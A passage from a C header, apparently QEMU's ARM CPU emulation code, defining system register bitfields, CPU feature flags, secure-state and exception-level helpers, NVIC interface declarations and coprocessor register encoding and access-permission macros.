R_ID_AA64ISAR0_DP_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_DP_SHIFT, R_ID_AA64ISAR0_DP_LENGTH) #define R_ID_AA64ISAR0_FHM_SHIFT 48 #define R_ID_AA64ISAR0_FHM_LENGTH 4 #define R_ID_AA64ISAR0_FHM_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_FHM_SHIFT, R_ID_AA64ISAR0_FHM_LENGTH) #define R_ID_AA64ISAR0_TS_SHIFT 52 #define R_ID_AA64ISAR0_TS_LENGTH 4 #define R_ID_AA64ISAR0_TS_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_TS_SHIFT, R_ID_AA64ISAR0_TS_LENGTH) #define R_ID_AA64ISAR0_TLB_SHIFT 56 #define R_ID_AA64ISAR0_TLB_LENGTH 4 #define R_ID_AA64ISAR0_TLB_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_TLB_SHIFT, R_ID_AA64ISAR0_TLB_LENGTH) #define R_ID_AA64ISAR0_RNDR_SHIFT 60 #define R_ID_AA64ISAR0_RNDR_LENGTH 4 #define R_ID_AA64ISAR0_RNDR_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_RNDR_SHIFT, R_ID_AA64ISAR0_RNDR_LENGTH) #else FIELD(ID_AA64ISAR0, SHA3, 32, 4) FIELD(ID_AA64ISAR0, SM3, 36, 4) FIELD(ID_AA64ISAR0, SM4, 40, 4) FIELD(ID_AA64ISAR0, DP, 44, 4) FIELD(ID_AA64ISAR0, FHM, 48, 4) FIELD(ID_AA64ISAR0, TS, 52, 4) FIELD(ID_AA64ISAR0, TLB, 56, 4) FIELD(ID_AA64ISAR0, RNDR, 60, 4) #endif FIELD(ID_AA64ISAR1, DPB, 0, 4) FIELD(ID_AA64ISAR1, APA, 4, 4) FIELD(ID_AA64ISAR1, API, 8, 4) FIELD(ID_AA64ISAR1, JSCVT, 12, 4) FIELD(ID_AA64ISAR1, FCMA, 16, 4) FIELD(ID_AA64ISAR1, LRCPC, 20, 4) FIELD(ID_AA64ISAR1, GPA, 24, 4) FIELD(ID_AA64ISAR1, GPI, 28, 4) #ifdef _MSC_VER #define R_ID_AA64ISAR1_FRINTTS_SHIFT 32 #define R_ID_AA64ISAR1_FRINTTS_LENGTH 4 #define R_ID_AA64ISAR1_FRINTTS_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR1_FRINTTS_SHIFT, R_ID_AA64ISAR1_FRINTTS_LENGTH) #define R_ID_AA64ISAR1_SB_SHIFT 36 #define R_ID_AA64ISAR1_SB_LENGTH 4 #define R_ID_AA64ISAR1_SB_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR1_SB_SHIFT, R_ID_AA64ISAR1_SB_LENGTH) #define R_ID_AA64ISAR1_SPECRES_SHIFT 40 #define R_ID_AA64ISAR1_SPECRES_LENGTH 4 #define R_ID_AA64ISAR1_SPECRES_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR1_SPECRES_SHIFT, R_ID_AA64ISAR1_SPECRES_LENGTH) #else FIELD(ID_AA64ISAR1, FRINTTS, 32, 4) FIELD(ID_AA64ISAR1, SB, 36, 4) FIELD(ID_AA64ISAR1, SPECRES, 40, 4) #endif FIELD(ID_AA64PFR0, EL0, 0, 4) FIELD(ID_AA64PFR0, EL1, 4, 4) FIELD(ID_AA64PFR0, EL2, 8, 4) FIELD(ID_AA64PFR0, EL3, 12, 4) FIELD(ID_AA64PFR0, FP, 16, 4) FIELD(ID_AA64PFR0, ADVSIMD, 20, 4) FIELD(ID_AA64PFR0, GIC, 24, 4) FIELD(ID_AA64PFR0, RAS, 28, 4) #ifdef _MSC_VER #define R_ID_AA64PFR0_SVE_SHIFT 60 #define R_ID_AA64PFR0_SVE_LENGTH 4 #define R_ID_AA64PFR0_SVE_MASK MAKE_64BIT_MASK(R_ID_AA64PFR0_SVE_SHIFT, R_ID_AA64PFR0_SVE_LENGTH) #else FIELD(ID_AA64PFR0, SVE, 32, 4) #endif FIELD(ID_AA64PFR1, BT, 0, 4) FIELD(ID_AA64PFR1, SBSS, 4, 4) FIELD(ID_AA64PFR1, MTE, 8, 4) FIELD(ID_AA64PFR1, RAS_FRAC, 12, 4) FIELD(ID_AA64MMFR0, PARANGE, 0, 4) FIELD(ID_AA64MMFR0, ASIDBITS, 4, 4) FIELD(ID_AA64MMFR0, BIGEND, 8, 4) FIELD(ID_AA64MMFR0, SNSMEM, 12, 4) FIELD(ID_AA64MMFR0, BIGENDEL0, 16, 4) FIELD(ID_AA64MMFR0, TGRAN16, 20, 4) FIELD(ID_AA64MMFR0, TGRAN64, 24, 4) FIELD(ID_AA64MMFR0, TGRAN4, 28, 4) #ifdef _MSC_VER #define R_ID_AA64MMFR0_TGRAN16_2_SHIFT 32 #define R_ID_AA64MMFR0_TGRAN16_2_LENGTH 4 #define R_ID_AA64MMFR0_TGRAN16_2_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR0_TGRAN16_2_SHIFT, R_ID_AA64MMFR0_TGRAN16_2_LENGTH) #define R_ID_AA64MMFR0_TGRAN64_2_SHIFT 36 #define R_ID_AA64MMFR0_TGRAN64_2_LENGTH 4 #define R_ID_AA64MMFR0_TGRAN64_2_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR0_TGRAN64_2_SHIFT, R_ID_AA64MMFR0_TGRAN64_2_LENGTH) #define R_ID_AA64MMFR0_TGRAN4_2_SHIFT 40 #define R_ID_AA64MMFR0_TGRAN4_2_LENGTH 4 #define R_ID_AA64MMFR0_TGRAN4_2_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR0_TGRAN4_2_SHIFT, R_ID_AA64MMFR0_TGRAN4_2_LENGTH) #define R_ID_AA64MMFR0_EXS_SHIFT 44 #define R_ID_AA64MMFR0_EXS_LENGTH 4 #define R_ID_AA64MMFR0_EXS_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR0_EXS_SHIFT, R_ID_AA64MMFR0_EXS_LENGTH) #else FIELD(ID_AA64MMFR0, TGRAN16_2, 32, 4) FIELD(ID_AA64MMFR0, TGRAN64_2, 36, 4) FIELD(ID_AA64MMFR0, TGRAN4_2, 40, 4) FIELD(ID_AA64MMFR0, EXS, 44, 4) #endif FIELD(ID_AA64MMFR1, HAFDBS, 0, 4) FIELD(ID_AA64MMFR1, VMIDBITS, 4, 4) FIELD(ID_AA64MMFR1, VH, 8, 4) FIELD(ID_AA64MMFR1, HPDS, 12, 4) FIELD(ID_AA64MMFR1, LO, 16, 4) FIELD(ID_AA64MMFR1, PAN, 20, 4) FIELD(ID_AA64MMFR1, SPECSEI, 24, 4) FIELD(ID_AA64MMFR1, XNX, 28, 4) FIELD(ID_AA64MMFR2, CNP, 0, 4) FIELD(ID_AA64MMFR2, UAO, 4, 4) FIELD(ID_AA64MMFR2, LSM, 8, 4) FIELD(ID_AA64MMFR2, IESB, 12, 4) FIELD(ID_AA64MMFR2, VARANGE, 16, 4) FIELD(ID_AA64MMFR2, CCIDX, 20, 4) FIELD(ID_AA64MMFR2, NV, 24, 4) FIELD(ID_AA64MMFR2, ST, 28, 4) #ifdef _MSC_VER #define R_ID_AA64MMFR2_AT_SHIFT 32 #define R_ID_AA64MMFR2_AT_LENGTH 4 #define R_ID_AA64MMFR2_AT_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_AT_SHIFT, R_ID_AA64MMFR2_AT_LENGTH) #define R_ID_AA64MMFR2_IDS_SHIFT 36 #define R_ID_AA64MMFR2_IDS_LENGTH 4 #define R_ID_AA64MMFR2_IDS_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_IDS_SHIFT, R_ID_AA64MMFR2_IDS_LENGTH) #define R_ID_AA64MMFR2_FWB_SHIFT 40 #define R_ID_AA64MMFR2_FWB_LENGTH 4 #define R_ID_AA64MMFR2_FWB_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_FWB_SHIFT, R_ID_AA64MMFR2_FWB_LENGTH) #define R_ID_AA64MMFR2_TTL_SHIFT 48 #define R_ID_AA64MMFR2_TTL_LENGTH 4 #define R_ID_AA64MMFR2_TTL_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_TTL_SHIFT, R_ID_AA64MMFR2_TTL_LENGTH) #define R_ID_AA64MMFR2_BBM_SHIFT 52 #define R_ID_AA64MMFR2_BBM_LENGTH 4 #define R_ID_AA64MMFR2_BBM_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_BBM_SHIFT, R_ID_AA64MMFR2_BBM_LENGTH) #define R_ID_AA64MMFR2_EVT_SHIFT 56 #define R_ID_AA64MMFR2_EVT_LENGTH 4 #define R_ID_AA64MMFR2_EVT_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_EVT_SHIFT, R_ID_AA64MMFR2_EVT_LENGTH) #define R_ID_AA64MMFR2_E0PD_SHIFT 60 #define R_ID_AA64MMFR2_E0PD_LENGTH 4 #define R_ID_AA64MMFR2_E0PD_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_E0PD_SHIFT, R_ID_AA64MMFR2_E0PD_LENGTH) #else FIELD(ID_AA64MMFR2, AT, 32, 4) FIELD(ID_AA64MMFR2, IDS, 36, 4) FIELD(ID_AA64MMFR2, FWB, 40, 4) FIELD(ID_AA64MMFR2, TTL, 48, 4) FIELD(ID_AA64MMFR2, BBM, 52, 4) FIELD(ID_AA64MMFR2, EVT, 56, 4) FIELD(ID_AA64MMFR2, E0PD, 60, 4) #endif FIELD(ID_AA64DFR0, DEBUGVER, 0, 4) FIELD(ID_AA64DFR0, TRACEVER, 4, 4) FIELD(ID_AA64DFR0, PMUVER, 8, 4) FIELD(ID_AA64DFR0, BRPS, 12, 4) FIELD(ID_AA64DFR0, WRPS, 20, 4) FIELD(ID_AA64DFR0, CTX_CMPS, 28, 4) #ifdef _MSC_VER #define R_ID_AA64DFR0_PMSVER_SHIFT 32 #define R_ID_AA64DFR0_PMSVER_LENGTH 4 #define R_ID_AA64DFR0_PMSVER_MASK MAKE_64BIT_MASK(R_ID_AA64DFR0_PMSVER_SHIFT, R_ID_AA64DFR0_PMSVER_LENGTH) #define R_ID_AA64DFR0_DOUBLELOCK_SHIFT 36 #define R_ID_AA64DFR0_DOUBLELOCK_LENGTH 4 #define R_ID_AA64DFR0_DOUBLELOCK_MASK MAKE_64BIT_MASK(R_ID_AA64DFR0_DOUBLELOCK_SHIFT, R_ID_AA64DFR0_DOUBLELOCK_LENGTH) #define R_ID_AA64DFR0_TRACEFILT_SHIFT 40 #define R_ID_AA64DFR0_TRACEFILT_LENGTH 4 #define R_ID_AA64DFR0_TRACEFILT_MASK MAKE_64BIT_MASK(R_ID_AA64DFR0_TRACEFILT_SHIFT, R_ID_AA64DFR0_TRACEFILT_LENGTH) #else FIELD(ID_AA64DFR0, PMSVER, 32, 4) FIELD(ID_AA64DFR0, DOUBLELOCK, 36, 4) FIELD(ID_AA64DFR0, TRACEFILT, 40, 4) #endif FIELD(ID_DFR0, COPDBG, 0, 4) FIELD(ID_DFR0, COPSDBG, 4, 4) FIELD(ID_DFR0, MMAPDBG, 8, 4) FIELD(ID_DFR0, COPTRC, 12, 4) FIELD(ID_DFR0, MMAPTRC, 16, 4) FIELD(ID_DFR0, MPROFDBG, 20, 4) FIELD(ID_DFR0, PERFMON, 24, 4) FIELD(ID_DFR0, TRACEFILT, 28, 4) FIELD(DBGDIDR, SE_IMP, 12, 1) FIELD(DBGDIDR, NSUHD_IMP, 14, 1) FIELD(DBGDIDR, VERSION, 16, 4) FIELD(DBGDIDR, CTX_CMPS, 20, 4) FIELD(DBGDIDR, BRPS, 24, 4) FIELD(DBGDIDR, WRPS, 28, 4) FIELD(MVFR0, SIMDREG, 0, 4) FIELD(MVFR0, FPSP, 4, 4) FIELD(MVFR0, FPDP, 8, 4) FIELD(MVFR0, FPTRAP, 12, 4) FIELD(MVFR0, FPDIVIDE, 16, 4) FIELD(MVFR0, FPSQRT, 20, 4) FIELD(MVFR0, FPSHVEC, 24, 4) FIELD(MVFR0, FPROUND, 28, 4) FIELD(MVFR1, FPFTZ, 0, 4) FIELD(MVFR1, FPDNAN, 4, 4) FIELD(MVFR1, SIMDLS, 8, 4) FIELD(MVFR1, SIMDINT, 12, 4) FIELD(MVFR1, SIMDSP, 16, 4) FIELD(MVFR1, SIMDHP, 20, 4) FIELD(MVFR1, FPHP, 24, 4) FIELD(MVFR1, SIMDFMAC, 28, 4) FIELD(MVFR2, SIMDMISC, 0, 4) FIELD(MVFR2, FPMISC, 4, 4) QEMU_BUILD_BUG_ON(ARRAY_SIZE(((ARMCPU *)0)->ccsidr) <= R_V7M_CSSELR_INDEX_MASK); /* If adding a feature bit which corresponds to a Linux ELF * HWCAP bit, remember to update the feature-bit-to-hwcap * mapping in linux-user/elfload.c:get_elf_hwcap(). */ enum arm_features { ARM_FEATURE_AUXCR, /* ARM1026 Auxiliary control register. */ ARM_FEATURE_XSCALE, /* Intel XScale extensions. */ ARM_FEATURE_IWMMXT, /* Intel iwMMXt extension. */ ARM_FEATURE_V6, ARM_FEATURE_V6K, ARM_FEATURE_V7, ARM_FEATURE_THUMB2, ARM_FEATURE_PMSA, /* no MMU; may have Memory Protection Unit */ ARM_FEATURE_NEON, ARM_FEATURE_M, /* Microcontroller profile. */ ARM_FEATURE_OMAPCP, /* OMAP specific CP15 ops handling. */ ARM_FEATURE_THUMB2EE, ARM_FEATURE_V7MP, /* v7 Multiprocessing Extensions */ ARM_FEATURE_V7VE, /* v7 Virtualization Extensions (non-EL2 parts) */ ARM_FEATURE_V4T, ARM_FEATURE_V5, ARM_FEATURE_STRONGARM, ARM_FEATURE_VAPA, /* cp15 VA to PA lookups */ ARM_FEATURE_GENERIC_TIMER, ARM_FEATURE_MVFR, /* Media and VFP Feature Registers 0 and 1 */ ARM_FEATURE_DUMMY_C15_REGS, /* RAZ/WI all of cp15 crn=15 */ ARM_FEATURE_CACHE_TEST_CLEAN, /* 926/1026 style test-and-clean ops */ ARM_FEATURE_CACHE_DIRTY_REG, /* 1136/1176 cache dirty status register */ ARM_FEATURE_CACHE_BLOCK_OPS, /* v6 optional cache block operations */ ARM_FEATURE_MPIDR, /* has cp15 MPIDR */ ARM_FEATURE_PXN, /* has Privileged Execute Never bit */ ARM_FEATURE_LPAE, /* has Large Physical Address Extension */ ARM_FEATURE_V8, ARM_FEATURE_AARCH64, /* supports 64 bit mode */ ARM_FEATURE_CBAR, /* has cp15 CBAR */ ARM_FEATURE_CRC, /* ARMv8 CRC instructions */ ARM_FEATURE_CBAR_RO, /* has cp15 CBAR and it is read-only */ ARM_FEATURE_EL2, /* has EL2 Virtualization support */ ARM_FEATURE_EL3, /* has EL3 Secure monitor support */ ARM_FEATURE_THUMB_DSP, /* DSP insns supported in the Thumb encodings */ ARM_FEATURE_PMU, /* has PMU support */ ARM_FEATURE_VBAR, /* has cp15 VBAR */ ARM_FEATURE_M_SECURITY, /* M profile Security Extension */ ARM_FEATURE_M_MAIN, /* M profile Main Extension */ }; static inline int arm_feature(CPUARMState *env, int feature) { return (env->features & (1ULL << feature)) != 0; } /* Return true if exception levels below EL3 are in secure state, * or would be following an exception return to that level. * Unlike arm_is_secure() (which is always a question about the * _current_ state of the CPU) this doesn't care about the current * EL or mode. */ static inline bool arm_is_secure_below_el3(CPUARMState *env) { if (arm_feature(env, ARM_FEATURE_EL3)) { return !(env->cp15.scr_el3 & SCR_NS); } else { /* If EL3 is not supported then the secure state is implementation * defined, in which case QEMU defaults to non-secure. */ return false; } } /* Return true if the CPU is AArch64 EL3 or AArch32 Mon */ static inline bool arm_is_el3_or_mon(CPUARMState *env) { if (arm_feature(env, ARM_FEATURE_EL3)) { if (is_a64(env) && extract32(env->pstate, 2, 2) == 3) { /* CPU currently in AArch64 state and EL3 */ return true; } else if (!is_a64(env) && (env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_MON) { /* CPU currently in AArch32 state and monitor mode */ return true; } } return false; } /* Return true if the processor is in secure state */ static inline bool arm_is_secure(CPUARMState *env) { if (arm_is_el3_or_mon(env)) { return true; } return arm_is_secure_below_el3(env); } /** * arm_hcr_el2_eff(): Return the effective value of HCR_EL2. * E.g. when in secure state, fields in HCR_EL2 are suppressed, * "for all purposes other than a direct read or write access of HCR_EL2." * Not included here is HCR_RW. */ uint64_t arm_hcr_el2_eff(CPUARMState *env); /* Return true if the specified exception level is running in AArch64 state. */ static inline bool arm_el_is_aa64(CPUARMState *env, int el) { /* This isn't valid for EL0 (if we're in EL0, is_a64() is what you want, * and if we're not in EL0 then the state of EL0 isn't well defined.) */ assert(el >= 1 && el <= 3); bool aa64 = arm_feature(env, ARM_FEATURE_AARCH64); /* The highest exception level is always at the maximum supported * register width, and then lower levels have a register width controlled * by bits in the SCR or HCR registers. */ if (el == 3) { return aa64; } if (arm_feature(env, ARM_FEATURE_EL3)) { aa64 = aa64 && (env->cp15.scr_el3 & SCR_RW); } if (el == 2) { return aa64; } if (arm_feature(env, ARM_FEATURE_EL2) && !arm_is_secure_below_el3(env)) { aa64 = aa64 && (env->cp15.hcr_el2 & HCR_RW); } return aa64; } /* Function for determing whether guest cp register reads and writes should * access the secure or non-secure bank of a cp register. When EL3 is * operating in AArch32 state, the NS-bit determines whether the secure * instance of a cp register should be used. When EL3 is AArch64 (or if * it doesn't exist at all) then there is no register banking, and all * accesses are to the non-secure version. */ static inline bool access_secure_reg(CPUARMState *env) { bool ret = (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && !(env->cp15.scr_el3 & SCR_NS)); return ret; } /* Macros for accessing a specified CP register bank */ #define A32_BANKED_REG_GET(_env, _regname, _secure) \ ((_secure) ? (_env)->cp15._regname##_s : (_env)->cp15._regname##_ns) #define A32_BANKED_REG_SET(_env, _regname, _secure, _val) \ do { \ if (_secure) { \ (_env)->cp15._regname##_s = (_val); \ } else { \ (_env)->cp15._regname##_ns = (_val); \ } \ } while (0) /* Macros for automatically accessing a specific CP register bank depending on * the current secure state of the system. These macros are not intended for * supporting instruction translation reads/writes as these are dependent * solely on the SCR.NS bit and not the mode. */ #define A32_BANKED_CURRENT_REG_GET(_env, _regname) \ A32_BANKED_REG_GET((_env), _regname, \ (arm_is_secure(_env) && !arm_el_is_aa64((_env), 3))) #define A32_BANKED_CURRENT_REG_SET(_env, _regname, _val) \ A32_BANKED_REG_SET((_env), _regname, \ (arm_is_secure(_env) && !arm_el_is_aa64((_env), 3)), \ (_val)) void arm_cpu_list(void); uint32_t arm_phys_excp_target_el(CPUState *cs, uint32_t excp_idx, uint32_t cur_el, bool secure); /* Interface between CPU and Interrupt controller. */ bool armv7m_nvic_can_take_pending_exception(void *opaque); /** * armv7m_nvic_set_pending: mark the specified exception as pending * @opaque: the NVIC * @irq: the exception number to mark pending * @secure: false for non-banked exceptions or for the nonsecure * version of a banked exception, true for the secure version of a banked * exception. * * Marks the specified exception as pending. Note that we will assert() * if @secure is true and @irq does not specify one of the fixed set * of architecturally banked exceptions. */ void armv7m_nvic_set_pending(void *opaque, int irq, bool secure); /** * armv7m_nvic_set_pending_derived: mark this derived exception as pending * @opaque: the NVIC * @irq: the exception number to mark pending * @secure: false for non-banked exceptions or for the nonsecure * version of a banked exception, true for the secure version of a banked * exception. * * Similar to armv7m_nvic_set_pending(), but specifically for derived * exceptions (exceptions generated in the course of trying to take * a different exception). */ void armv7m_nvic_set_pending_derived(void *opaque, int irq, bool secure); /** * armv7m_nvic_set_pending_lazyfp: mark this lazy FP exception as pending * @opaque: the NVIC * @irq: the exception number to mark pending * @secure: false for non-banked exceptions or for the nonsecure * version of a banked exception, true for the secure version of a banked * exception. * * Similar to armv7m_nvic_set_pending(), but specifically for exceptions * generated in the course of lazy stacking of FP registers. */ void armv7m_nvic_set_pending_lazyfp(void *opaque, int irq, bool secure); /** * armv7m_nvic_get_pending_irq_info: return highest priority pending * exception, and whether it targets Secure state * @opaque: the NVIC * @pirq: set to pending exception number * @ptargets_secure: set to whether pending exception targets Secure * * This function writes the number of the highest priority pending * exception (the one which would be made active by * armv7m_nvic_acknowledge_irq()) to @pirq, and sets @ptargets_secure * to true if the current highest priority pending exception should * be taken to Secure state, false for NS. */ void armv7m_nvic_get_pending_irq_info(void *opaque, int *pirq, bool *ptargets_secure); /** * armv7m_nvic_acknowledge_irq: make highest priority pending exception active * @opaque: the NVIC * * Move the current highest priority pending exception from the pending * state to the active state, and update v7m.exception to indicate that * it is the exception currently being handled. */ void armv7m_nvic_acknowledge_irq(void *opaque); /** * armv7m_nvic_complete_irq: complete specified interrupt or exception * @opaque: the NVIC * @irq: the exception number to complete * @secure: true if this exception was secure * * Returns: -1 if the irq was not active * 1 if completing this irq brought us back to base (no active irqs) * 0 if there is still an irq active after this one was completed * (Ignoring -1, this is the same as the RETTOBASE value before completion.) */ int armv7m_nvic_complete_irq(void *opaque, int irq, bool secure); /** * armv7m_nvic_get_ready_status(void *opaque, int irq, bool secure) * @opaque: the NVIC * @irq: the exception number to mark pending * @secure: false for non-banked exceptions or for the nonsecure * version of a banked exception, true for the secure version of a banked * exception. * * Return whether an exception is "ready", i.e. whether the exception is * enabled and is configured at a priority which would allow it to * interrupt the current execution priority. This controls whether the * RDY bit for it in the FPCCR is set. */ bool armv7m_nvic_get_ready_status(void *opaque, int irq, bool secure); /** * armv7m_nvic_raw_execution_priority: return the raw execution priority * @opaque: the NVIC * * Returns: the raw execution priority as defined by the v8M architecture. * This is the execution priority minus the effects of AIRCR.PRIS, * and minus any PRIMASK/FAULTMASK/BASEPRI priority boosting. * (v8M ARM ARM I_PKLD.) */ int armv7m_nvic_raw_execution_priority(void *opaque); /** * armv7m_nvic_neg_prio_requested: return true if the requested execution * priority is negative for the specified security state. * @opaque: the NVIC * @secure: the security state to test * This corresponds to the pseudocode IsReqExecPriNeg(). */ bool armv7m_nvic_neg_prio_requested(void *opaque, bool secure); /* Interface for defining coprocessor registers. * Registers are defined in tables of arm_cp_reginfo structs * which are passed to define_arm_cp_regs(). */ /* When looking up a coprocessor register we look for it * via an integer which encodes all of: * coprocessor number * Crn, Crm, opc1, opc2 fields * 32 or 64 bit register (ie is it accessed via MRC/MCR * or via MRRC/MCRR?) * non-secure/secure bank (AArch32 only) * We allow 4 bits for opc1 because MRRC/MCRR have a 4 bit field. * (In this case crn and opc2 should be zero.) * For AArch64, there is no 32/64 bit size distinction; * instead all registers have a 2 bit op0, 3 bit op1 and op2, * and 4 bit CRn and CRm. The encoding patterns are chosen * to be easy to convert to and from the KVM encodings, and also * so that the hashtable can contain both AArch32 and AArch64 * registers (to allow for interprocessing where we might run * 32 bit code on a 64 bit core). */ /* This bit is private to our hashtable cpreg; in KVM register * IDs the AArch64/32 distinction is the KVM_REG_ARM/ARM64 * in the upper bits of the 64 bit ID. */ #define CP_REG_AA64_SHIFT 28 #define CP_REG_AA64_MASK (1 << CP_REG_AA64_SHIFT) /* To enable banking of coprocessor registers depending on ns-bit we * add a bit to distinguish between secure and non-secure cpregs in the * hashtable. */ #define CP_REG_NS_SHIFT 29 #define CP_REG_NS_MASK (1 << CP_REG_NS_SHIFT) #define ENCODE_CP_REG(cp, is64, ns, crn, crm, opc1, opc2) \ ((ns) << CP_REG_NS_SHIFT | ((cp) << 16) | ((is64) << 15) | \ ((crn) << 11) | ((crm) << 7) | ((opc1) << 3) | (opc2)) #define ENCODE_AA64_CP_REG(cp, crn, crm, op0, op1, op2) \ (CP_REG_AA64_MASK | \ ((cp) << CP_REG_ARM_COPROC_SHIFT) | \ ((op0) << CP_REG_ARM64_SYSREG_OP0_SHIFT) | \ ((op1) << CP_REG_ARM64_SYSREG_OP1_SHIFT) | \ ((crn) << CP_REG_ARM64_SYSREG_CRN_SHIFT) | \ ((crm) << CP_REG_ARM64_SYSREG_CRM_SHIFT) | \ ((op2) << CP_REG_ARM64_SYSREG_OP2_SHIFT)) #if 0 /* Convert a full 64 bit KVM register ID to the truncated 32 bit * version used as a key for the coprocessor register hashtable */ static inline uint32_t kvm_to_cpreg_id(uint64_t kvmid) { uint32_t cpregid = kvmid; if ((kvmid & CP_REG_ARCH_MASK) == CP_REG_ARM64) { cpregid |= CP_REG_AA64_MASK; } else { if ((kvmid & CP_REG_SIZE_MASK) == CP_REG_SIZE_U64) { cpregid |= (1 << 15); } /* KVM is always non-secure so add the NS flag on AArch32 register * entries. */ cpregid |= 1 << CP_REG_NS_SHIFT; } return cpregid; } /* Convert a truncated 32 bit hashtable key into the full * 64 bit KVM register ID. */ static inline uint64_t cpreg_to_kvm_id(uint32_t cpregid) { uint64_t kvmid; if (cpregid & CP_REG_AA64_MASK) { kvmid = cpregid & ~CP_REG_AA64_MASK; kvmid |= CP_REG_SIZE_U64 | CP_REG_ARM64; } else { kvmid = cpregid & ~(1 << 15); if (cpregid & (1 << 15)) { kvmid |= CP_REG_SIZE_U64 | CP_REG_ARM; } else { kvmid |= CP_REG_SIZE_U32 | CP_REG_ARM; } } return kvmid; } #endif /* ARMCPRegInfo type field bits. If the SPECIAL bit is set this is a * special-behaviour cp reg and bits [11..8] indicate what behaviour * it has. Otherwise it is a simple cp reg, where CONST indicates that * TCG can assume the value to be constant (ie load at translate time) * and 64BIT indicates a 64 bit wide coprocessor register. SUPPRESS_TB_END * indicates that the TB should not be ended after a write to this register * (the default is that the TB ends after cp writes). OVERRIDE permits * a register definition to override a previous definition for the * same (cp, is64, crn, crm, opc1, opc2) tuple: either the new or the * old must have the OVERRIDE bit set. * ALIAS indicates that this register is an alias view of some underlying * state which is also visible via another register, and that the other * register is handling migration and reset; registers marked ALIAS will not be * migrated but may have their state set by syncing of register state from KVM. * NO_RAW indicates that this register has no underlying state and does not * support raw access for state saving/loading; it will not be used for either * migration or KVM state synchronization. (Typically this is for "registers" * which are actually used as instructions for cache maintenance and so on.) * IO indicates that this register does I/O and therefore its accesses * need to be surrounded by gen_io_start()/gen_io_end(). In particular, * registers which implement clocks or timers require this. * RAISES_EXC is for when the read or write hook might raise an exception; * the generated code will synchronize the CPU state before calling the hook * so that it is safe for the hook to call raise_exception(). * NEWEL is for writes to registers that might change the exception * level - typically on older ARM chips. For those cases we need to * re-read the new el when recomputing the translation flags. */ #define ARM_CP_SPECIAL 0x0001 #define ARM_CP_CONST 0x0002 #define ARM_CP_64BIT 0x0004 #define ARM_CP_SUPPRESS_TB_END 0x0008 #define ARM_CP_OVERRIDE 0x0010 #define ARM_CP_ALIAS 0x0020 #define ARM_CP_IO 0x0040 #define ARM_CP_NO_RAW 0x0080 #define ARM_CP_NOP (ARM_CP_SPECIAL | 0x0100) #define ARM_CP_WFI (ARM_CP_SPECIAL | 0x0200) #define ARM_CP_NZCV (ARM_CP_SPECIAL | 0x0300) #define ARM_CP_CURRENTEL (ARM_CP_SPECIAL | 0x0400) #define ARM_CP_DC_ZVA (ARM_CP_SPECIAL | 0x0500) #define ARM_LAST_SPECIAL ARM_CP_DC_ZVA #define ARM_CP_FPU 0x1000 #define ARM_CP_SVE 0x2000 #define ARM_CP_NO_GDB 0x4000 #define ARM_CP_RAISES_EXC 0x8000 #define ARM_CP_NEWEL 0x10000 /* Used only as a terminator for ARMCPRegInfo lists */ #define ARM_CP_SENTINEL 0xfffff /* Mask of only the flag bits in a type field */ #define ARM_CP_FLAG_MASK 0x1f0ff /* Valid values for ARMCPRegInfo state field, indicating which of * the AArch32 and AArch64 execution states this register is visible in. * If the reginfo doesn't explicitly specify then it is AArch32 only. * If the reginfo is declared to be visible in both states then a second * reginfo is synthesised for the AArch32 view of the AArch64 register, * such that the AArch32 view is the lower 32 bits of the AArch64 one. * Note that we rely on the values of these enums as we iterate through * the various states in some places. */ enum { ARM_CP_STATE_AA32 = 0, ARM_CP_STATE_AA64 = 1, ARM_CP_STATE_BOTH = 2, }; /* ARM CP register secure state flags. These flags identify security state * attributes for a given CP register entry. * The existence of both or neither secure and non-secure flags indicates that * the register has both a secure and non-secure hash entry. A single one of * these flags causes the register to only be hashed for the specified * security state. * Although definitions may have any combination of the S/NS bits, each * registered entry will only have one to identify whether the entry is secure * or non-secure. */ enum { ARM_CP_SECSTATE_S = (1 << 0), /* bit[0]: Secure state register */ ARM_CP_SECSTATE_NS = (1 << 1), /* bit[1]: Non-secure state register */ }; /* Return true if cptype is a valid type field. This is used to try to * catch errors where the sentinel has been accidentally left off the end * of a list of registers. */ static inline bool cptype_valid(int cptype) { return ((cptype & ~ARM_CP_FLAG_MASK) == 0) || ((cptype & ARM_CP_SPECIAL) && ((cptype & ~ARM_CP_FLAG_MASK) <= ARM_LAST_SPECIAL)); } /* Access rights: * We define bits for Read and Write access for what rev C of the v7-AR ARM ARM * defines as PL0 (user), PL1 (fiq/irq/svc/abt/und/sys, ie privileged), and * PL2 (hyp). The other level which has Read and Write bits is Secure PL1 * (ie any of the privileged modes in Secure state, or Monitor mode). * If a register is accessible in one privilege level it's always accessible * in higher privilege levels too. Since "Secure PL1" also follows this rule * (ie anything visible in PL2 is visible in S-PL1, some things are only * visible in S-PL1) but "Secure PL1" is a bit of a mouthful, we bend the * terminology a little and call this PL3. * In AArch64 things are somewhat simpler as the PLx bits line up exactly * with the ELx exception levels. * * If access permissions for a register are more complex than can be * described with these bits, then use a laxer set of restrictions, and * do the more restrictive/complex check inside a helper function. */ #define PL3_R 0x80 #define PL3_W 0x40 #define PL2_R (0x20 | PL3_R) #define PL2_W (0x10 | PL3_W) #define PL1_R (0x08 | PL2_R) #define PL1_W (0x04 | PL2_W) #define PL0_R (0x02 | PL1_R) #define PL0_W (0x01 | PL1_W) /* * For user-mode some registers are accessible to EL0 via a kernel * trap-and-emulate ABI. In this case we define the read permissions * as actually being PL0_R. However some bits of any given register * may still be masked. */ #define PL0U_R PL1_R #define PL3_RW (PL3_R | 